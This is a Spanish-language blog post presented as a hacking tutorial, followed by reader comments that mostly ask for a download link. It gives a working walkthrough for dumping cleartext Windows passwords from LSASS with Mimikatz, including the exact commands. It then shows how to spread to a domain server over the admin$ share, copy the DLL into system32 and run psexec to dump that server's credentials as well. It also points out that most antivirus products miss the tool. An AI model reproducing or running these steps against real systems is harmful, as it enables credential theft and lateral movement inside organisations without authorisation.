[Hacking] Descifrar / sacar las contraseñas de un dominio Windows

25 marzo, 2013

Hacking

¿Que es el Mimikatz?

Mimikatz es un programa desarrollado por Gentil Kiwi que nos permite descifrar las contraseñas de los administradores de un pc con Windows, a exportación de certificados marcados como no exportables o la obtención de hashes de la SAM. También se puede usar en un dominio.

En este momento la ventaja que presenta esta aplicación es que no es detectado como aplicación maliciosa. Solo 8 de 44 antivirus la detecta como aplicación maliciosa.

SHA256: 62e1d5ed52e96ce76b7ffc7ba6e6fd08c3688f704e1927de0bf8e590d3d19a9a
SHA1: 90f65fbee03f928e665e305a624d1f34552da53e
MD5: 6fb46b002c3180fe5c41840d0fc84f6f
File size: 568.5 KB ( 582193 bytes )

¿Que antivirus detecta mimikatz?

Commtouch – W32/Trojan.ITZH-4147

ESET-NOD32 – Win32/HackTool.Mimikatz.D

Ikarus – HackTool.Win32.Mimikatz

Kaspersky – HackTool.Win32.Mimikatz.a

PCTools – Hacktool.Mimikatz

TrendMicro – TROJ_GEN.RCBZ1BJ

TrendMicro-HouseCall – TROJ_GEN.RCBH1AU

VIPRE – Trojan.Win32.Generic!BT

¿Como se usa mimikatz?

Solo hacemos doble click encima del ejecutable mimikatz.exe

listado_archivos

En este momento nos saldrá una ventana tipo ms-dos:

inicio_mimikatz

Para sacar el nombre de usuario usamos el comando system::user y para el nombre de la maquina : system::computer

nombre usuario y maquina

Hasta ahora todo muy sencillo

¿Como descifrar contraseñas del dominio?

1. Como es una herramienta que no explota ninguna vulnerabilidad necesitamos la contraseña del administrador de dominio. Por mi experiencia muchos de los administradores de sistemas cuando se conectan a los ordenadores usan un usuario con derecho de administrador sobre la maquina y por otro lado definen la contraseña de administrador local de la maquina la misma con la del dominio ( “que no caduca nunca :D”).

Primero sacamos las contraseñas del ordenador local. El primer comando será: privilege:debug y después inject::process lsass.exe sekurlsa.dll. El resultado de estos dos lineas de comando será :

local_mimikatz

Si hemos llegado a este punto vamos a solicitar las contraseñas en claro con : sekurlsa::logonPasswords full

cotrasena_en_claro_mimikatz

Como se puede observar en el imagen de arriba tenemos por lo menos dos contraseñas una del administrador local de la maquina y la otra de un usuario del dominio. Solo lo que debemos hacer ahora es entrar en Inicio -> ejecutar -> cmd y pulsamos intro. En la ventana con la consola usaremos el siguiente comando: net use \\<ip maquina>\admin$

conexion_servidor

En la carpeta con el ejecutable mimikatz tenemos que tener también la herramienta psexec . Descarga mimikatz + psexec

listado_archivos

 

Ahora en la misma ventana de la consola ms-dos cambiamos de carpeta con el comando cd hasta que llegamos dentro de la carpeta mimikatz. Luego ejecutamos el comando copy sekurlsa.dll \\<ip maquina>\admin$\system32 en mi caso el ip es 192.168.1.2

copiar_sekurlsa

Una vez que el archivo .dll esta copiado en el servidor ejecutamos el siguiente comando psexec /accepteula \\192.168.1.2\ -c mimikatz.exe y comprobamos con los comandos system::user y system::computer . Ahora lo unico que queda para hacer es utilizar otra vez lo mismos comandos como en local privilege:debug , después inject::process lsass.exe sekurlsa.dll y para obtener las contraseñas del servidor sekurlsa::logonPasswords full

acceso_servidor

Ver articulo eliminar virus mimikatz ( en construcción)

, ,

19 Responses to “[Hacking] Descifrar / sacar las contraseñas de un dominio Windows”

  1. john Says:

    podes subir la descarga de mimikatz 1.0 + psexec ? el link esta roto

    Reply

  2. Juan AAA Says:

    amigo buen día. puedes enviarme el link del mimikatz 1.0 + psexec por favor?

    Reply

  3. Jhonatan Says:

    Hola buen día.

    Podrías enviarme el link por favor.

    Reply

  4. jeremiselxi Says:

    Hola

    Podrías enviarme el link a mi tambien.

    Saludos.

    Reply

  5. Caldea Says:

    Estimado, necesito sacar mi equipo de un dominio antiguo. Creo que esta herramienta me podría servir. ¿Me podrías enviar el link del mimikatz 1.0 + psexec?

    Saludos.

    Reply

  6. milton Says:

    Por favor me pasas el link???

    Reply

  7. Evelyn Says:

    Buenos días, puedes enviarme el link de mimikatz 1.0 + psexec por favor.
    evelynig817@gmail.com

    Reply

  8. Starlyng Says:

    Hola amigo podrias enviarme el enlace para mimikatz?

    Reply

  9. PandaLoco Says:

    Muy buenas, ¿Podrías enviármelo al correo, por favor?

    Reply

  10. Richardzord Says:

    podes subir la descarga de mimikatz 1.0 + psexec ?

    Reply

  11. Daniel Says:

    Buenas, sabes como hacer auditoria desde el servidor, ya estoy autenticado y dentro del servidor que contiene todo el DA. Muchas gracias

    Reply

  12. darklgrx Says:

    Hola, podrias pasarme el link para descargar los archivos? muchas gracias

    Reply

  13. mambicho Says:

    Estimado me puedes proporcionar la ruta de descarga de Descarga mimikatz + psexec

    Reply

Leave a Reply

Verificación Humana *